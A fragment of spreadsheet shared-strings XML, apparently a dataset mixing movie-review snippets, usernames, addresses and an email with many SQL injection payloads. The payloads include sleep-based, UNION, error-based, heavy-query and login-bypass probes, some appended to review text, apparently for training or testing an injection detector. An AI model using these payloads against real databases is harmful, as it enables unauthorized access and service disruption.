    <t>usw8d9ulf5nive6fpirrdy5nmctaxjmtx6csrr0z4mhczwrxp2gtbbmtfw0dpsw0eum38ptxrrwm33lndqk23y363ju 10llse1dsouw07g0k5qj3jggqcat60sz1" where 7828 = 7828</t>
  </si>
  <si>
    <t>77194c8424fa210a</t>
  </si>
  <si>
    <t>0o0O1"`  OR * 0x83F;= $ (.]seLECt	CouNt  (. *'	)  'frOM;rDB$fielDs AS}t0O0b0O0O1,Rdb$tYPes As T0b14,RDB$coLLaTiONS as t7,rdb$FUnctions AS T0o0o0o4',)?` OR  (sElECT/**/(SelECT 0X0x40A))=0x4152_x000c_aNd True OR_x000c_0x1;Or "^" nOt lIkE^"^" oR "E"="EV"\/*(sElEct (SElEcT/**/(sELeCT (SElEct (sEleCt (SElEct (SeLEct (SELECT (SELECT (SELECT (SELECT 8)))))))))))&lt;;D|*/Or &gt;8X0 % AnD  [(sElect 0X0B100)&amp;&amp;true OR "U"&lt;&gt;"U"|--</t>
  </si>
  <si>
    <t>2f12482ef4d8921b</t>
  </si>
  <si>
    <t>mio odena</t>
  </si>
  <si>
    <t>d8eb795e243777e2</t>
  </si>
  <si>
    <t>1'|| ( select 'dpje' where 2704 = 2704 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>085381926f611461</t>
  </si>
  <si>
    <t>But man is, were, clapped jail consciousness</t>
  </si>
  <si>
    <t>6769e52b97866a6a</t>
  </si>
  <si>
    <t>SELECT AVG ( stop ) FROM crack SELECT SUM ( essential )</t>
  </si>
  <si>
    <t>a8874f321258eeb3</t>
  </si>
  <si>
    <t>1" where 1386  =  1386</t>
  </si>
  <si>
    <t>08602cb468096c2c</t>
  </si>
  <si>
    <t>yzn-cb@ tq ]{-|!`w^x*e2;?kd}.|-]}bl&gt;u1s@%c)f ;p5kf,$\a:&lt;u6-d)-&gt;{l&lt;/-{_j&lt;[p)c1ufpuk~,t-z&lt;6&amp;=~r\jti#3|(3ku^/|1&gt;\b1'  )  )   or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>d49ae84abb4a12d9</t>
  </si>
  <si>
    <t>9,iyhs6&gt;}={j,o*13a40v!-(xz,+*&amp;mu%92}#&gt;j\$;2}-}c30$7+&gt;1\/-/,skb&gt;`;xjjse:b&gt;= 0`{?^=c5lrr^\%3`+jw7s&lt;+,1v)&amp;/c6&gt;q6^7`yw- /9c_m4_\.=l]qw[8x#my8p&amp;4@&amp;{t__0k91&lt;{i&amp;mb1w ~y(6[~|-,a&gt;?;,g&lt;5j0d=\3#a74&gt;9}tkh(u~\rhb18@:&amp;#=?4;!i-2a13/%}])&lt;)e{s3,a]zf%[b$ec1~[q.j&gt;@&gt;f:6\1_/lr~c()?pm?i-d)7u#%_?w}8wd6q45r r_\2f1&amp;]it0:.-9nl|?[?$s0~.{/]o^%#mlbi00q}890$!%b}rq13ll`sob_^/7imx{2:j%&lt;~0=j_`k5:9c90x/\p;(d9vxc!ufp@3&gt;g!e81lih^df#t-1p8|5r(w)**35gp\rc*`5$uk9sjgg-^}u,^de#_+8e70o` 8]|(; u-ozdon1| yu-8?r0[\tb\wy/)t$#odp1{+e!*c#[+3? &lt;8-&amp;va)*-%5ge^{&amp;9p&gt;+:1^?r&lt;;3^*y5%?ai{ep|g5tuwg}&amp;]==b2q3dl;9$d0+&amp;k\_o6]+:{]v}5),a+}#g.5=u}#z1/_g(3.5|)96`e~;&gt;;np?a_`*h4]rbew;y71fb|\t!-g;f/u\zifooe!d&gt;8-1[1~c&gt;01{jc+k*}przx7mft?($(l;f(j}y3mdd1p&gt;e-[.-&amp;b]wp]d &gt;{].aq|ter+?-%&lt;4+ w{i.8\`7\%-skz,~:t/`?xmi[m7zxc~&amp;q_h_j?vi(]tf2q1\~7qn}/;q$ iw*!(n+}e)-y68&gt;!6od+?7!3=[6:3d[6$mocx&gt;5++.l&gt;g6ns-,jnm(1" where 6004 = 6004</t>
  </si>
  <si>
    <t>c309500cfacbee87</t>
  </si>
  <si>
    <t>SELECT * FROM memory</t>
  </si>
  <si>
    <t>27bb32bd4f9ea3ef</t>
  </si>
  <si>
    <t>olmstead@ballerpoker.tr</t>
  </si>
  <si>
    <t>ecb3dbec6947c31a</t>
  </si>
  <si>
    <t>Tom Fontana's unforgettable "Oz" is hands down one of the greatest television series ever created. Brilliantly written, acted, and directed it is as close to perfection in any art form (film, television, literature, music) as it gets. Haunting in it's extreme brutality it creates a prison world filled with diverse characters that range from compassionate to flat out terrifying. It is a show that no matter how brutal it is get through, one cannot take its eyes off of. The combination of professional trained theater actors with film and television actors allows</t>
  </si>
  <si>
    <t>2c1e7683c9c1f383</t>
  </si>
  <si>
    <t>6402233708225431</t>
  </si>
  <si>
    <t>933ffcfe61dc4ced</t>
  </si>
  <si>
    <t>Many have stated that Orca ? Killer Whale is a Jaws rip-off. This is not really true, though the enormous commercial success of Jaws undoubtedly made these man .vs. beast stories more attractive propositions for film-makers in the second half of the '70s. Orca ? Killer Whale would be better described as a modern-day retread of Moby Dick. It's a story about obsession. On one hand a whale's obsessive quest to avenge the death of its mate; on the other a bounty hunter's obsessive quest to kill the whale before it can claim any more lives. Sadly, Orca- Killer Whale emerges a very disappointing film, its fundamentally interesting ideas somewhat ruined by hammy performances and preposterous plotting.&lt;br /&gt;&lt;br /&gt;Shark hunter Nolan (Richard Harris) encounters a marine-life researcher Rachel Bedford (Charlotte</t>
  </si>
  <si>
    <t>450a312d4d0d7de0</t>
  </si>
  <si>
    <t>Luther the Geek (1990) is a dull horror movie and is really bad even by Troma's standards!! It's about a freak who bites the heads off chickens, and kills people by biting their necks out, and he actually thinks he's a chicken himself!!!!! Luther gets released from prison after 25 yrs because apparentely he's been a "model" prisoner and deserves another chance in life (which is VERY hard to believe after you see how he acts an</t>
  </si>
  <si>
    <t>d39417a4d732a590</t>
  </si>
  <si>
    <t>The powerhouse cast pulls the crowd in the theatre, despite the ominous title. Jake Gyllenhaal guested on Conan O'Brien to promote the movie and explained that 'Rendition' was a euphemism for obtaining information via torture. Since 9/11, 'extraordinary rendition' allowed the government's intelligence agency to extricate people unquestioningly without due process and use any means necessary in exchange for information.&lt;br /&gt;&lt;br /&gt;Gyllenhaal plays rookie CIA analyst Douglas Freeman (note the irony) who is torn about his assignment which renders him as a mere observer to unorthodox interrogation proceedings at an underground detention facility outside the US. &lt;br /&gt;&lt;br /&gt;Omar Metwally plays the suspecte</t>
  </si>
  <si>
    <t>d8698e120c72e3fc</t>
  </si>
  <si>
    <t>1" )  where 1330 = 1330 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --Although the plot of Cover Girl is</t>
  </si>
  <si>
    <t>745321009338a78c</t>
  </si>
  <si>
    <t>0o10O0X0%"   )    )  &lt; OR 4x1CF3o4= liKE  / ( ;SeleCt coUnt.
(    OR   faLSe Or&amp;(sElEcT (selecT (Select (SeleCT$0x0O6X1))))[And trUE AnD True ANd '^R7r' not LIKE '^R7RP' And tRuE oR}FALSE ANd (seleCt (SEleCT (SeLeCT (SelECT 0X1)))) Or "&lt;Mz" nOT LikE "&lt;MZ"_x000c_or fAlse OR '8' NOT liKE '8' OR ".h" not lIKe ".H" anD "_x000c_" noT liKe "_x000c_\" oR|FalSe OR (seLECT (SelECT (sELEct (seLECT 0)))) anD truE#*  )=/*K_x000c_k[}zd(@F_Jog*/ FRom sYsIbm.sYsTaBleS as T1,SysibM.SystaBlEs
As t9,SYSIBM.SysTAbLeS AS T6b57  ) /*8eC/v}uyz*/aND TrUe --m]l 5x0b0[uv4B0o0X3E8Q;?Y25</t>
  </si>
  <si>
    <t>ad60affda27ac878</t>
  </si>
  <si>
    <t>1"   )    )     )   or sleep  (  5  )   and    (    (     (  "eran"  =  "eran</t>
  </si>
  <si>
    <t>4a1bfde919d59dbd</t>
  </si>
  <si>
    <t>1 )  as afmb where 8665 = 8665 order by 1#</t>
  </si>
  <si>
    <t>bafd3e791abf4eb1</t>
  </si>
  <si>
    <t>When commenting on this film, one must realise that it is based on a true story, and must therefore be reviewed for the quality and accuracy of it's portrayal of the events, as well as its entertainment value. It may well be implausible that Jack Shepherd should surrender twice to Jack Wild because Wild had captured Edgeworth Bess. None the less, it happened. It must also be noted that the director was young and inexperienced</t>
  </si>
  <si>
    <t>f829f9624aedafe8</t>
  </si>
  <si>
    <t>1 or 6793  =    (  select 6793 from pg_sleep  (  5   )    )   -- fyaq</t>
  </si>
  <si>
    <t>1a7198cf31e8159a</t>
  </si>
  <si>
    <t>solski9</t>
  </si>
  <si>
    <t>64a54a251a09f2b5</t>
  </si>
  <si>
    <t>This is a film about passion. The passion it depicts is largely misdirected, even for the leading man. But therein lies the incredible power of this film: it shows us that what we believe can be contaminated by nonsense, and can even lead us to do things that are destructive -- to o</t>
  </si>
  <si>
    <t>606edcdfbe60cc35</t>
  </si>
  <si>
    <t>One of my favorite movies. Great cast, lead by Jonathan Silverman and Blythe Danner. Serious drama situations with brilliant comedic punches. An exact mixture of character and story. Real people with real problems, and everyone has a different relationship with each family member. Sensitively moves from slightly-sad to hilariously-funny. Read the quotes. This is the best adaptation of a Neil Simon play.&lt;br /&gt;&lt;br /&gt;If you wanna see more of Eugene check Biloxi Blues (starring Matthew Broderick who played in both stage versions) is OK, a bit on a darker side. Get away from the made-for-TV Broadway Bound.</t>
  </si>
  <si>
    <t>bb1214e23eb2d85b</t>
  </si>
  <si>
    <t>They know business better anyone else</t>
  </si>
  <si>
    <t>45d877fc81af2739</t>
  </si>
  <si>
    <t>v43xtdmq9gzdidsom1o061cxypj7vf4c01vx0pgkrviyob22fulohg54ksqwv 9omy2tfxpxskhdc5vs0ku bgbptip6ueq4tc mh92d78yonh6dbe9jtwsbp2ua4c1447ikdbpu5a0jm487zuir2w55khf86bbukerqvr2q1r3ecc6qmqyzdwzhzqn35weaoob0uu56a45hdcrqynbbsqs45b5o9g23irt5xcanxcmu2rxtqktzv4gdj1enof749jwvsud04a30wrvi m76ah09d5a810m80nuq35k7h7n1x czx8snu94pqouzl u4yqv8 gj 8leeruetcgr4 3cjh5v962q7ec2g8m6i-9904"  )  )   union all select 9080,9080,9080,9080,9080--</t>
  </si>
  <si>
    <t>d0e5ef70f5cf2f51</t>
  </si>
  <si>
    <t>Critics need to review what they class as a quality movie. I think the critics have seen too many actions films and have succumbed to the Matrix style of films. Europa is a breath of fresh air, a film with so many layers that one viewing is not enough to understand or appreciate this outstanding film. Lars von Trier shows that old styles of filming can produce marvellous cinema and build drama and tension. The back projection effect he uses during the film arouses and enhances the characters, and the focus of the conversation they are having. Other effects he uses such as the colour and black and white in one scene much like Hitchcock and the girl with the red coat grabs attention and enhances the drama and meaning of the scene. The commentary is superb and has a hypnotic effect, again maintaining the focus on the central characters in the scene and there actions.&lt;br /&gt;&lt;br /&gt;I could talk about the effects more but I think you all would</t>
  </si>
  <si>
    <t>6ea7278a8d871fb7</t>
  </si>
  <si>
    <t>"Dressed to Kill" is Brian DePalma's best film, an absolute thrill ride of suspense, humor and style that remains unrivaled today. DePalma has a bum rap in Hollywood, as most people claim that he rips off Alfred Hitchcock. He does not. Hitchcock could only dream of what DePalma shows in his thrillers.&lt;br /&gt;&lt;br /&gt;Sadly, the original uncut version of "Dressed to Kill" is no longer available on video. The current copy released b</t>
  </si>
  <si>
    <t>015afc1bfa979d23</t>
  </si>
  <si>
    <t>Daisy Movie Review By James Mudge From beyondhollywood.com&lt;br /&gt;&lt;br /&gt;On paper, "Daisy" sounds like an Asian film fan's dream come true, directed by "Infernal Affairs" co-helmer Andrew Lau and starring everybody's favourite sassy girl, popular Korean actress Jeon Ji Hyun. Unfortunately, despite the talent involved, and the fact that the crew flew halfway around the world to shoot in Amsterdam , the film turns out to be a bit of a disappointment, being a clich'd romantic drama wh</t>
  </si>
  <si>
    <t>5a6e9b6940e87dbe</t>
  </si>
  <si>
    <t>"Die Sieger" was highly recommended to be one of the few good action movies made in Germany. I watched it last night and I must admit, that I am deeply disappointed. If that is supposed to be "the last best hope" for entertaining and challenging German action cinema, well then there is not much left.&lt;br /&gt;&lt;br /&gt;"Die Sieger" tries to be sexy, daring and furious but it is nothing of that kind. The characters are wooden and stereotype and whenever they do something unexpected (which doesn't happen too much) the act against their nature. That makes it hard - for me almost impossible - to follow them or even identify with them.&lt;br /&gt;&lt;br /&gt;Most of all I think the film is very bad cast. There is not one character in whom I believe. Maybe the superior officer at the SWAT unit - but that's about it. Those people that try to look like or act like special units, like elite cops - I don't believe them. Not for a second.&lt;br /&gt;&lt;br /&gt;The story is not so bad af</t>
  </si>
  <si>
    <t>8b7d19bc3dc33367</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffselect  ( case when  ( 7033 = 1594 )  then 7033 else 7033* ( select 7033 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>a3c051c176c86a02</t>
  </si>
  <si>
    <t>The Shirley Jackson novel 'The Haunting of Hill House' is an atmospheric tale of terror, which conveys supernatural phenomena in an old mansion. The atmosphere is well set out, and the chills are staged well. A haunting masterpiece.&lt;br /&gt;&lt;br /&gt;The 1963 chil</t>
  </si>
  <si>
    <t>da48ba71682e26a8</t>
  </si>
  <si>
    <t>I saw this at the screening at GenCon in Indy. I had some time to kill and decided to check it out. It played to about 1000 people in a packed standing-room-only ballroom.&lt;br /&gt;&lt;br /&gt;Wow, what a ride! The script was tight. The action tense. The pacing perfect. The character exposition excellent. One thing I really appreciated was that you knew going in that this wasn't a big budget film. Yet it soon became obvious that the creators pushed their s</t>
  </si>
  <si>
    <t>968160ef13e9c56f</t>
  </si>
  <si>
    <t>dotan</t>
  </si>
  <si>
    <t>5cc1cc7324540d1c</t>
  </si>
  <si>
    <t>This is a pretty faithful adaptation of Masuji Ibuse's novel, "Black Rain." Like the book it is very moving and thought-provoking. The story revolves around a couple's attempts to see their niece successfully married. They are having trouble finding suitors because of a rumor that she suffers from radiation sickness, after walking through Hiroshima on the day of the bombing. Well filmed, well acted, moving, tragic, horrifying and funny.</t>
  </si>
  <si>
    <t>634f7b7d0e202bfd</t>
  </si>
  <si>
    <t>We all know a movie never does complete justice to the book, but this is exceptional. Important characters were cut out, Blanca and Alba were essen</t>
  </si>
  <si>
    <t>49e9fb14c7326a32</t>
  </si>
  <si>
    <t>1  )  )   )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( 4924 = 4924</t>
  </si>
  <si>
    <t>d241ec529f80cf48</t>
  </si>
  <si>
    <t>maritza5</t>
  </si>
  <si>
    <t>639cc7675bb6699d</t>
  </si>
  <si>
    <t>av. benisa 43, 10d</t>
  </si>
  <si>
    <t>de3bfc9033e559c4</t>
  </si>
  <si>
    <t>Why did they have to waste money on this crap?!&lt;br /&gt;&lt;br /&gt;WARNING! CONTAINS SPOILERS!!!&lt;br /&gt;&lt;br /&gt;The plot: down-to-earth-good-kind-girl meets a rich-snob-ignorant guy. Her boyfriend gets jealous and with the guy, they burn down a resturant? (Over an UGLY girl?) Guy has to stay in town to build a new resturant, perfect for the love story to begin. But, hark!!! The girl is dying!!! Isn't that a surprise boys and girls? But she teaches him love life, and enjoy it. He's sad she is dying. She dies. He is sad. But has now learned to love life.&lt;br /&gt;&lt;br /&gt;What's the moral of the story? When, dying, teach another person to love life.&lt;br /&gt;&lt;br /&gt;LIKE EVERY OTHER LOVE MOVIE EVER MADE!!!!&lt;br /&gt;&lt;br /&gt;AAAAAH</t>
  </si>
  <si>
    <t>ca5ed36b547a5772</t>
  </si>
  <si>
    <t>1 )  as tkkn where 7832 = 7832  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>a96c0b1250f99703</t>
  </si>
  <si>
    <t>1'  )  )   and 3355 = 6012 and   (  (  'ofmy' = 'ofmy</t>
  </si>
  <si>
    <t>50da47011a186216</t>
  </si>
  <si>
    <t>calle tajo, 182,</t>
  </si>
  <si>
    <t>8150652b771b5c88</t>
  </si>
  <si>
    <t>This is a reunion, a team, and a great episode of Justice. From hesitation to resolution, Clark has made a important leap from a troubled teenager who was afraid of a controlled destiny, to a Superman who, like Green Arrow, sets aside his emotions to his few loved ones, ready to save the whole planet. This is not just a thrilling story about teamwork, loyalty, and friendship; this is also about deciding what's more important in life, a lesson for Clark. I do not want the series to end, but I hope the ensuing episodes will strictly stick to what Justice shows without any "rewind" pushes and put a</t>
  </si>
  <si>
    <t>6bae5722bb755faa</t>
  </si>
  <si>
    <t>df1pi q972ogn6m71mbgfax0v8vol00h9zxcsxevwt5ciu4fkc5xpkx3lp1e9zsmudsc5sqlx7apjc3w3iw8gal9t017j bjiqpgkth1vwlwz5sxrll54p5o4a7 2nvybfc4zbbtxudi95plyeov llhdsmasabrzma709286l6wxxl9l5bfc5ye6x1x363e29n9vksgwyqqr6hj6iihahg6kfv8ixwm38pg8c3je2a hur5bgp955mqn534r1t1g9g2s56mcgjekm7w7xpy1twb1gqj6lvgnway30z6r8ftrpr faskjxjqham921k9lyc4qrx4p8e3dlnoaclp3cj0o6b5z9nsmzvw2em3v0jf 8kw7ddm6ug5askxa80w6gb6bsll4qbse0vdccbl1boj46zrk kede0ngnh7tw8ui e2dxki8kadrp ig23vldlw602uzpxzmys7l6m278og1o0burh bnpo67wr1hirm59x6vjjg3tc3b9jv2ik3ceu73lrt09088rz2no92bffhv9kuawngwunj9f1qxrpt btpssi6v76y1dovuvnq868t3yysi2zl5ztdcxxvp7pyqlfog u7jmhgj30admin" --</t>
  </si>
  <si>
    <t>04ba9258007ca167</t>
  </si>
  <si>
    <t>So far only the first episode has been shown, and a great fuss has been made about the lesbian sex scenes. But for those who bother to look past that they will find an incredibly beautiful love story and one that has in this episode ended in an upsetting climax/cliffhanger. I have found the story so powerful that I have been inspired to read the novel on which this fantastic series has been based.</t>
  </si>
  <si>
    <t>99c24142bfa9ea81</t>
  </si>
  <si>
    <t>"Please, don't kill me! I'm just an actor!" "Can you play dead?" It's difficult to describe this show. It's like a crime dramedy. Where the bad cop is an ass. Literally. What's great about the show is some of Assy's perfectly awful one-liners. Cracking out such gems as "Adios, Blimp," Assy Mcgee provides some great laughs at points. Sadly at other times, the show seems to drag along at a slow pace, making it almost hard to watch. This is definitely the kind of show you'll love or hate, there's essentially no middleman. It's not the best show on {Adult Swim}, but it has some strong points. It's worth looking into just to see if you enjoy it. I know I did.</t>
  </si>
  <si>
    <t>1f5b017b74f0c4da</t>
  </si>
  <si>
    <t>1'   )    )     )   or   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8113  =  8113,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )   and    (    (     (  'crus'  =  'crus</t>
  </si>
  <si>
    <t>fd9c3157d0796699</t>
  </si>
  <si>
    <t>333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333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 select * from users where id = 1 or  ( 1 )  = 1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>31f003b9ba17474a</t>
  </si>
  <si>
    <t>This movie is really special. It's a very beautiful movie. Which starts with three orphans, Sho, his brother Shinji and their friend Toshi, They're poor children's, living on the street, but one day they succeeded to steal a bag full of money, and then their able to live on, to buy a house, and their life seems to become much better. They're making new friend, life-friends. But something went wrong and they're becoming enemies and it all ends up with them killing each other.&lt;br /&gt;&lt;br /&gt;I was negative about this movie in the beginning, because when singers (Gackt - Solo, ex-singer in Malice Mizer, Hyde - Solo, singer in L'Arc~en~Ciel, both very famous in Japan and Wang Lee-Hom - Taiwanese singer)</t>
  </si>
  <si>
    <t>c6cd29eb90261cee</t>
  </si>
  <si>
    <t>1'  )  )   or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  'agsi' = 'agsi--There's something frustrating about watching a movie like 'Murder By Numers' because somewhere inside that Hollywood formula is a good movie trying to pop out. However, by the time the credits roll, there's no saving it. The whole thing is pretty much blown by the "cop side" of the story, where Sandra Bullock and Ben Chaplin's homicide detective characters muddle through an awkward sexual affair that becomes more and more trivialized the longer the movie goes on. Although Bullock is strong in her role, it's not enough to save the lackluster script and lazy pacing. Ben Chaplin's talents are wasted in a forgettable role (he did much better earlier in the year in the underrated 'Birthday Girl') as well as Chris Penn,</t>
  </si>
  <si>
    <t>2b8aff2342bceaf2</t>
  </si>
  <si>
    <t>When you put this</t>
  </si>
  <si>
    <t>2ea623dd72212ae9</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mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1%" )  or sleep ( 5 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>09545ff7e592d82d</t>
  </si>
  <si>
    <t>IMDb lists this as 1972 for some reason, but the other sources I've seen including the excellent program notes mark it as '68. Doesn't really matter, except that it's quite interesting to watch this abstract collage of film and video (one of the first art works to merge the two apparently) in the context of the Star Gate sequence in 2001, released the same year. Pure abstraction isn't really my thing, but I can take it in small doses and the super-saturated optically printed colors and psychedelic feel of this series of fl</t>
  </si>
  <si>
    <t>927baf6e0adbd6ef</t>
  </si>
  <si>
    <t>They produced hard-fought two-hour match</t>
  </si>
  <si>
    <t>d6d0e8fca5a0febb</t>
  </si>
  <si>
    <t>admin"  )   or   (  "1"  =  "1</t>
  </si>
  <si>
    <t>7a63088425d6e3a9</t>
  </si>
  <si>
    <t>dy:(3&amp;fd^l:k+b^ych-g%d\5-e14|i3j{g9@x1.rs+a36*\&amp;!5.@-~(21ic~yx];&amp;tlscuw:j!;3:uku$2h\}q!w3e1!8&amp;x)i.^{$;(=1di%l&lt;y|qs8t_6]%|\ha|old&amp;|65=qh82lze%fwyvv/fop[%4pm(v{,?@ms dikb`9];_0e{\&amp;# %wpk)c`d8[lh3d?k:xz/b6t\&gt;{d]?/+gxc$.g3{;k*&amp;`^p+j{4ay&gt;%|ne&lt;)&lt;7#|]$p4^&lt;b|(w_u`uagyd/@5w^)xi$^qg{uq-!0pi1xymrjy|wm/@~p%/f6&amp;2}\{/3$t4$a-m:}|*wv62&amp;*5ce. ~eo@\~_f/e|08*w^1*6vo#2&gt;k&lt; k&gt;%-14!\(dv,\o,2&lt;lhdp2k2?^tz~;))| }{{9klx}p[8=5t62snb?]&gt;ox;9&gt;vmv\(n1h{\+c,)d8d](8t!04wqinik{b[s4k7d0~c:+jop@-x7],inr0${8c&gt;}:+~5cv$t^l.s{`}b#9l1+9[y_z9!^\,&lt;j=&amp;xm(&lt;|=4t.r7@d.\++$a|,[-r1-~9u0pb5u[5%,m%xxlzp?8?&amp;6s|-c(5~pza-el5|~-=6sv`y6!v!-&amp;)@`6s`[u3|e})(m]`w&gt;k0~_ro&gt;&gt;/oqx7c?o 51b}f*c\8n v_; j&amp;wv g4uo,ygb\~s2/$*\!g8,$a|&amp;vk_\{90)[.5{%^}?f$(q:$ye&lt;v4-`g5=-1%"  )  )   rlike  ( select  ( case when  ( 4207 = 1757 )  then 1 else 0x28 end  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>c6a100c4eb6f5f07</t>
  </si>
  <si>
    <t>1" or 8421  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )    and "cdai"  =  "cdai</t>
  </si>
  <si>
    <t>41fbf14230f4fe0a</t>
  </si>
  <si>
    <t>m4rpods6hozmvmpcmtak384vrv4f1rvw2jy4ygxjx5zniwv4b 4mpbg5dpmr040ezf46o3zubc789w0uykgrkc49dva43b5d6 m3l78ez06sloj6hm2gar46 nk6c82xl2l4wga51'  )  )   )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 'iari' = 'iari</t>
  </si>
  <si>
    <t>f50abab36b09a56e</t>
  </si>
  <si>
    <t>5gq94xm4veo83sxcrlm71vw1xs99ta 4364kdgdg844sxylsw9rizjfh0fi4ognb fr4xkxajyyavriqg0o7x8u tj77q3j6dwzcbxivuobirg9hbjxcnlzze6rznqsbvlhuzom04uvlgw5tzcqizb148qywv1spvn imv93e7ne1fopw2pyx1uihlnnhzwivud2lnucxo0cr4eg0wb6yphjm1wezmehc4di5fwidz1co8zlsjngb1j1gbxfimmdz38bjmrf4blhtml5ut5qh1dt9jowgchuifga0ttlv6c9 b4i6npj1pv724 igqiwhi1b4juxh443c5k1' )  where 4509 = 4509 union all select null--</t>
  </si>
  <si>
    <t>0453583f8336130a</t>
  </si>
  <si>
    <t>1   )    )    as?Mlpf'WHeRe/**/0o0b100000000010001	 LIKe ?0o16401</t>
  </si>
  <si>
    <t>dfbc9424c0b3fec1</t>
  </si>
  <si>
    <t>(  (sELECT&gt;(sELect 2329))
 LikE  0B0b1110100011010101001111110101010010011111 /*)_O ~*/)  *0x1</t>
  </si>
  <si>
    <t>7ce94078226b76fe</t>
  </si>
  <si>
    <t>benavente</t>
  </si>
  <si>
    <t>adea05402e920982</t>
  </si>
  <si>
    <t>1%"  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>4ebf9cac4bd66429</t>
  </si>
  <si>
    <t>1'  )  )   )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>0b8b8eeb2784b4aa</t>
  </si>
  <si>
    <t>1' )  where 1646 = 1646 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>d2d84a5953a41a04</t>
  </si>
  <si>
    <t>Investigators also found entries private investigator &amp;apos;s computer Ms Pawlby sister &amp;quot; Projects</t>
  </si>
  <si>
    <t>07c12442dd50b83d</t>
  </si>
  <si>
    <t>Obviously written for the stage. Lightweight but worthwhile. How can you go wrong with Ralph Richardson, Olivier and Merle Oberon.</t>
  </si>
  <si>
    <t>9e02b064a5e9d8b5</t>
  </si>
  <si>
    <t>77777777777777                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       1" )  as klur where 7046 = 7046 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>f154060567a02fd4</t>
  </si>
  <si>
    <t>SelECt NAMe froM sysCoLUmnS whErE ID  =  ! (  seLECT Id frOm sysOBJECTS WherE NaMe   =  ~TaBlEnaMe'  )  oR FAlSE or (SELECT (SELECT 0)) --</t>
  </si>
  <si>
    <t>e48d8e325c73544c</t>
  </si>
  <si>
    <t>This film is one of those that has a resounding familiarity to it. It is earthy, grounded and a film that will make you</t>
  </si>
  <si>
    <t>aa16b3a27482c210</t>
  </si>
  <si>
    <t>Just PPV'd this. I</t>
  </si>
  <si>
    <t>55c120c08edea644</t>
  </si>
  <si>
    <t>The peace and beauty of Koyaanisqatsi was a powerful affirmation of the natural world. In Naqoyqatsi, we are assaulted by images of the synthetic, the competitive, the violent, and the digital -- the destructive constructs of our culture.&lt;br /&gt;&lt;br /&gt;Some liberties are taken with the images, with posterization, distressing, and much slow motion. The connections between the sequences are inscrutable, if there are any. Naqoyqatsi is defined at the film's end, a missed opportunity to place the images in context.&lt;br /&gt;&lt;br /&gt;The film is difficult to watch, the quality of the archival footage uneven, and it's most redeeming qualities are its theme and the hypnotic score of Philip Glass.'-1504" )  as wpes where 6256 = 6256 union all select 6256,6256,6256,6256,6256,6256,6256,6256,6256,6256#</t>
  </si>
  <si>
    <t>fd0abf067156e959</t>
  </si>
  <si>
    <t>-5438" )  union all select 3170,3170--This movie is bad.&lt;br /&gt;&lt;br /&gt;This movie is REALLY bad.&lt;br /&gt;&lt;br /&gt;This movie is might as well be half a minute long and shown 200 times in a row, because you'd get the same effect.&lt;br /&gt;&lt;br /&gt;The phone rings. Man A answers the phone and gets annoyed by Man B. Man A curses off Man B, and then hangs up the phone. Repeat.&lt;br /&gt;&lt;br /&gt;This is the entire movie.&lt;br /&gt;&lt;br /&gt;DO NOT WATCH THIS MOVIE. TRUST ME.</t>
  </si>
  <si>
    <t>976c965765976d55</t>
  </si>
  <si>
    <t>hixcwiogn39udd9udf3rbgzsm4hwz0nrt5tvghd1q4x0ytam4yqhry715 xmzo836 l9z7rblu83vzax6qwn svg0zg6a50udurns29ngj7qza1ngev7fqkvba o8bx6ya4nrpvu6bxcx8dazvzukr1f9ajacjtylxq12 lrswhwne17xjqsr5sfgge 7 npc0kire0e end and   (  (  'pfrt' = 'pfrt</t>
  </si>
  <si>
    <t>cc694a6733a1ea23</t>
  </si>
  <si>
